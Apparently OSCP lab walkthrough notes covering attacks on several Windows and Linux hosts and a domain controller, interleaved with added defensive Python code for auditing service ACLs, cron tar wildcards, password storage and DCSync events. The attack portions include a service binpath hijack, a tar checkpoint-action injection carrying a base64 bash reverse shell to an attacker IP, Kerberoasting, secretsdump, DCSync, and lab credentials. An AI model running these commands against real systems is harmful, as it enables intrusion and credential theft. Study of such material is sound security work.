
OSCP C

Network

Given:

  • 192.168.167.153 MS01
  • 192.168.167.155
  • 192.168.167.156
  • 192.168.167.157

Found:

  • 10.10.127.152 DC01
  • 10.10.127.153 MS02

Creds

eric.wallows:EricLikesRunning800 (given credentials for 192.168.127.153)
web_svc:Diamond1
administrator:December31 (local admin on MS01)

other users:
tom_admin

192.168.167.155

Enumeration

Initial Access

We search for a Mobile Mouse Server exploit.

We get the script; I had to fix its line breaks. We need an HTTP server to serve the reverse shell created with msfvenom, and a listener.

And run the script.

Privilege Escalation

Transfer winpeas to the host.

The GPGOrchestrator service has insecure permissions: we can change its binary path to a file we control and restart the service.

Transfer the reverse shell, start a listener, and:

sc config GPGOrchestrator binpath= "C:\users\tim\revshell2.exe"
sc stop GPGOrchestrator
sc start GPGOrchestrator
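The weakness behind the three sc commands above is a service ACL that lets a non-administrator change the configuration. Below is an added example, not code from the original write-up, that audits service records for exactly that: any principal outside SYSTEM/Administrators holding a configuration-changing right, and any binary path sitting in a user-writable folder (the state the service is left in after the path change). The records are constructed sample data shaped like `sc qc` output plus an ACL; only the name GPGOrchestrator comes from the notes, every path and principal is assumed.

```python
# Added example (not from the original write-up): audit which principals can
# reconfigure a Windows service and whether its binary lives somewhere an
# ordinary user can write. Records are constructed sample data; only the
# service name GPGOrchestrator comes from the notes.
from dataclasses import dataclass, field

# Rights that let a principal change what the service executes or who controls it.
DANGEROUS_RIGHTS = {
    "SERVICE_CHANGE_CONFIG", "WRITE_DAC", "WRITE_OWNER",
    "GENERIC_WRITE", "GENERIC_ALL", "SERVICE_ALL_ACCESS",
}

# Principals expected to hold those rights on a properly configured service.
TRUSTED_PRINCIPALS = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators"}

# Locations an unprivileged user can normally write to (lower-cased prefixes).
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\temp\\", "c:\\windows\\temp\\")


@dataclass
class Service:
    name: str
    binpath: str                               # BINARY_PATH_NAME as shown by `sc qc`
    aces: list = field(default_factory=list)   # (principal, right) pairs from the ACL


def audit_service(svc):
    """Return a list of findings for one service; an empty list means clean."""
    findings = []
    for principal, right in svc.aces:
        if right in DANGEROUS_RIGHTS and principal not in TRUSTED_PRINCIPALS:
            findings.append(f"{principal} holds {right}")
    exe = svc.binpath.strip('"').lower()
    if exe.startswith(USER_WRITABLE_PREFIXES):
        findings.append(f"binary path is in a user-writable location: {svc.binpath}")
    return findings


def audit_services(services):
    """Map service name -> findings, keeping only services with at least one."""
    report = {}
    for svc in services:
        findings = audit_service(svc)
        if findings:
            report[svc.name] = findings
    return report


# Constructed sample: the first service shows the weakness (Authenticated
# Users may change its configuration), the second shows what a service looks
# like after its path was pointed at a user-owned file, the third is secure.
SAMPLE_SERVICES = [
    Service("GPGOrchestrator", '"C:\\Program Files\\GPG\\orchestrator.exe"', [
        ("NT AUTHORITY\\SYSTEM", "SERVICE_ALL_ACCESS"),
        ("BUILTIN\\Administrators", "SERVICE_ALL_ACCESS"),
        ("NT AUTHORITY\\Authenticated Users", "SERVICE_CHANGE_CONFIG"),
    ]),
    Service("TamperedSvc", "C:\\users\\tim\\revshell2.exe", [
        ("NT AUTHORITY\\SYSTEM", "SERVICE_ALL_ACCESS"),
        ("BUILTIN\\Administrators", "SERVICE_ALL_ACCESS"),
    ]),
    Service("CleanSvc", '"C:\\Program Files\\Vendor\\svc.exe"', [
        ("NT AUTHORITY\\SYSTEM", "SERVICE_ALL_ACCESS"),
        ("BUILTIN\\Administrators", "SERVICE_ALL_ACCESS"),
        ("NT AUTHORITY\\Authenticated Users", "SERVICE_QUERY_STATUS"),
    ]),
]

if __name__ == "__main__":
    for name, findings in audit_services(SAMPLE_SERVICES).items():
        print(name)
        for finding in findings:
            print("  -", finding)
```

On a real host the ACE list would come from `sc sdshow <service>` or accesschk; the fix is to remove SERVICE_CHANGE_CONFIG (and WRITE_DAC/WRITE_OWNER) from non-administrative principals and to keep service binaries under directories that only administrators can write.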

Post Exploitation

192.168.167.156

Enumeration

Initial Access

We have Jack@oscp and then a reset password for Jack. Going to 192.168.177.156:8083, we find the Vesta panel login.

Trying Jack:3PUKsX98BMupBiCf.

Searching, I found vestaroot.py https://github.com/rekter0/exploits/blob/master/VestaCP/vestaROOT.py.

Post Exploitation

192.168.167.157

Enumeration

We can log in to the FTP server as anonymous. Inside, there is a bunch of PDF templates; running exiftool on their metadata gives us some usernames.

Initial Access

Port 20000 shows a Usermin login page.

We can try to use the usernames we have.

cassie:cassie works.

Use Usermin's command shell function.

Make a reverse shell with msfvenom and transfer it with a Python server and wget. Start an nc listener and execute the reverse shell.

Privilege Escalation

We can see a crontab entry that runs every 2 minutes.

It runs tar with a wildcard, and this can be abused to execute commands.

We need to create two files in /opt/admin. First, encode the reverse shell:

echo -n "bash -i >& /dev/tcp/192.168.45.229/5555 0>&1" | base64
touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=bash -c 'echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjIyOS81NTU1IDA+JjE= | base64 -d | bash'"

Start a listener on 5555 and wait for the cron task to execute.
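The cron job is exploitable only because the shell expands `*` in a directory the low-privileged user can write to and tar receives the resulting names before any `--`. The following is an added example, not part of the original write-up, that audits a system crontab for that pattern and lists the option-looking file names (like `--checkpoint=1`) that such a job would misparse. The crontab text is constructed; it mirrors the notes (a job every 2 minutes archiving /opt/admin) but the exact command line is assumed.

```python
# Added example (not from the original write-up): find cron jobs that hand a
# bare wildcard to tar, and list option-looking file names in a directory.
# The crontab text is constructed; the real command on the box is unknown.
import os
import re
import shlex

SAMPLE_CRONTAB = """\
# constructed sample /etc/crontab
SHELL=/bin/sh
*/2 * * * * root cd /opt/admin && tar -czf /tmp/admin.tgz *
0 3 * * *   root tar -czf /var/backups/etc.tgz -C /etc -- *
30 * * * *  root /usr/local/bin/cleanup.sh
"""

CRON_FIELDS = 5  # minute hour day month weekday, then user, then command


def parse_system_crontab(text):
    """Yield (schedule, user, command) for each job line of a system crontab."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or environment assignment
        parts = line.split(None, CRON_FIELDS + 1)
        if len(parts) < CRON_FIELDS + 2:
            continue
        yield " ".join(parts[:CRON_FIELDS]), parts[CRON_FIELDS], parts[CRON_FIELDS + 1]


def tar_wildcard_risk(command):
    """Return the directory whose entries the shell would expand, or None if safe.

    The job is risky when tar gets a glob that can expand to names beginning
    with '-' (a bare `*` or `?`) and no `--` precedes it: file names such as
    --checkpoint=1 are then parsed as options instead of archive members.
    The glob is expanded by the shell in its own working directory, which is
    why only `cd` (not tar's -C) changes the directory being tracked.
    """
    cwd = "."  # cron's working directory unless the command changes it
    for segment in re.split(r"&&|\|\||;", command):
        try:
            argv = shlex.split(segment)
        except ValueError:
            continue
        if not argv:
            continue
        if argv[0] == "cd" and len(argv) > 1:
            cwd = argv[1]
            continue
        if os.path.basename(argv[0]) != "tar":
            continue
        end_of_opts = argv.index("--") if "--" in argv else len(argv)
        for i, arg in enumerate(argv[1:], 1):
            if i > end_of_opts:
                continue  # after `--` every word is a file name, never an option
            if arg.startswith(("*", "?")):
                return cwd
    return None


def audit_crontab(text):
    """Map each risky tar command to the directory whose names it exposes to tar."""
    risky = {}
    for _, _, command in parse_system_crontab(text):
        directory = tar_wildcard_risk(command)
        if directory is not None:
            risky[command] = directory
    return risky


def option_like_names(entries):
    """Names beginning with '-' among `entries` (a directory path or a list of names)."""
    names = os.listdir(entries) if isinstance(entries, str) else list(entries)
    return sorted(n for n in names if n.startswith("-"))


if __name__ == "__main__":
    for command, directory in audit_crontab(SAMPLE_CRONTAB).items():
        print(f"risky: {command!r} expands * in {directory}")
        if os.path.isdir(directory):
            print("  option-like entries:", option_like_names(directory))
```

The second sample job shows the cheap fix: put `--` before the glob so everything after it is treated as a file name. Restricting write access to the archived directory removes the precondition entirely, and listing files explicitly (for example via `find -print0 | tar --null -T -`) avoids shell globbing altogether.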

Post Exploitation

192.168.167.153 MS01

Enumeration

Initial Access

We use the provided credentials eric.wallows:EricLikesRunning800.

Privilege Escalation

Transfer adpeas.ps1 and get important info.

Open an SSH tunnel.

Perform a Kerberoast attack.

Using hashcat.

A ping sweep of the internal network finds the third machine.

In the Erik folder, we see an admintool.exe program. If we execute it and enter a password, a debug mode is enabled that shows the comparison against the stored password as an MD5 hash. We can use hashcat to crack it.
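Two design mistakes make admintool.exe crackable: the stored value is an unsalted, fast MD5, and a debug path prints it. The following added example (not from the original write-up; admintool.exe's internals are unknown, `weak_check` only models the behaviour the notes describe) puts that comparison next to a verifier that stores a per-user salt with a slow PBKDF2 hash and compares in constant time.

```python
# Added example (not from the original write-up): a model of the weak
# password check described in the notes next to a hardened verifier.
import hashlib
import hmac
import os


def weak_check(typed, stored_md5_hex, debug=False):
    """Model of the admintool comparison: unsalted MD5, plain string equality."""
    digest = hashlib.md5(typed.encode()).hexdigest()
    if debug:
        # The leak: verbose output reveals the stored hash, which is cheap to
        # attack offline because MD5 is fast and carries no salt.
        print(f"DEBUG: comparing {digest} with stored {stored_md5_hex}")
    return digest == stored_md5_hex


def make_record(password, iterations=600_000):
    """Store a random per-user salt plus a PBKDF2-HMAC-SHA256 hash, never the password."""
    salt = os.urandom(16)
    derived = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt, "iterations": iterations, "hash": derived}


def strong_check(typed, record):
    """Re-derive with the stored salt and compare without an early exit."""
    derived = hashlib.pbkdf2_hmac("sha256", typed.encode(),
                                  record["salt"], record["iterations"])
    return hmac.compare_digest(derived, record["hash"])


def same_password_looks_different(password, iterations=50_000):
    """With per-user salts, two users sharing a password get unrelated records,
    so one cracked hash (or one precomputed table) does not cover both."""
    first = make_record(password, iterations)
    second = make_record(password, iterations)
    return first["hash"] != second["hash"]


if __name__ == "__main__":
    # Constructed sample password; nothing here comes from the lab.
    stored = hashlib.md5(b"Winter2024!").hexdigest()
    print("weak, debug on:", weak_check("guess", stored, debug=True))
    record = make_record("Winter2024!")
    print("strong, correct:", strong_check("Winter2024!", record))
    print("strong, wrong:", strong_check("winter2024!", record))
```

The iteration count is the tunable cost; 600,000 rounds of PBKDF2-HMAC-SHA256 is a reasonable current default, and the debug branch is simply something a production credential check should not have.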

Post Exploitation

We enter as administrator with the password we got.

Checking the administrator's PowerShell history, we find a password.

Checking with CME.

10.10.127.154 MS02

Enumeration

Initial Access

Using credentials found in MS01.

Post Exploitation

There is a Windows.old folder on C:, so we download the SAM and SYSTEM hives from it using Evil-WinRM's built-in download command.

Using impacket-secretsdump.

We know that tom_admin can perform DCSync to the DC, so we can secretsdump with his hash.
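A DCSync is a directory replication request, and the domain controller logs it as Security event 4662 with the replication extended-right GUIDs in the Properties field. The following added example (not from the original write-up) shows the detection a defender would run: flag any 4662 carrying those rights whose subject is not a known domain controller account. The log lines are a constructed, simplified key=value rendering of 4662/4624 events, not real output; the names DC01 and tom_admin come from the notes, everything else is assumed. The three replication GUIDs are the real Active Directory identifiers for those rights.

```python
# Added example (not from the original write-up): flag DCSync-style
# replication requests from accounts that are not domain controllers.
# Sample events are constructed and simplified; real 4662 events carry more fields.
import re

# Control-access rights needed for DCSync; these GUIDs are the real AD values.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Accounts that legitimately replicate (constructed allow-list: the DC's own
# computer account; add any sync service accounts you actually run).
DOMAIN_CONTROLLERS = {"DC01$"}

SAMPLE_EVENTS = """\
EventID=4662 Computer=DC01 SubjectUserName=DC01$ ObjectType=domainDNS Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
EventID=4662 Computer=DC01 SubjectUserName=tom_admin ObjectType=domainDNS Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
EventID=4662 Computer=DC01 SubjectUserName=eric.wallows ObjectType=user Properties={bf967aba-0de6-11d0-a285-00aa003049e2}
EventID=4624 Computer=DC01 SubjectUserName=tom_admin LogonType=3
"""

GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}", re.IGNORECASE)


def parse_event(line):
    """Turn one key=value rendered event line into a dict."""
    return dict(kv.split("=", 1) for kv in line.split() if "=" in kv)


def replication_rights_requested(event):
    """Names of replication rights present in the event's Properties field."""
    guids = GUID_RE.findall(event.get("Properties", ""))
    return [REPLICATION_RIGHTS[g.lower()] for g in guids if g.lower() in REPLICATION_RIGHTS]


def detect_dcsync(log_text, trusted=DOMAIN_CONTROLLERS):
    """Return (account, rights) for each 4662 replication request from a non-DC account."""
    hits = []
    for line in log_text.splitlines():
        event = parse_event(line)
        if event.get("EventID") != "4662":
            continue
        rights = replication_rights_requested(event)
        if rights and event.get("SubjectUserName") not in trusted:
            hits.append((event["SubjectUserName"], rights))
    return hits


if __name__ == "__main__":
    for account, rights in detect_dcsync(SAMPLE_EVENTS):
        print(f"possible DCSync by {account}: {', '.join(rights)}")
```

Auditing of directory service access must be enabled on the DCs for 4662 to be written at all, and the allow-list needs every account that replicates legitimately (other DCs, directory sync services), otherwise the rule produces noise. Beyond detection, the mitigation for the situation in the notes is to keep replication rights off ordinary admin accounts like tom_admin.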

10.10.127.152 DC01

Enumeration

Initial Access

We have the hash for tom_admin, so we perform a DCSync to the DC.

Using the hash: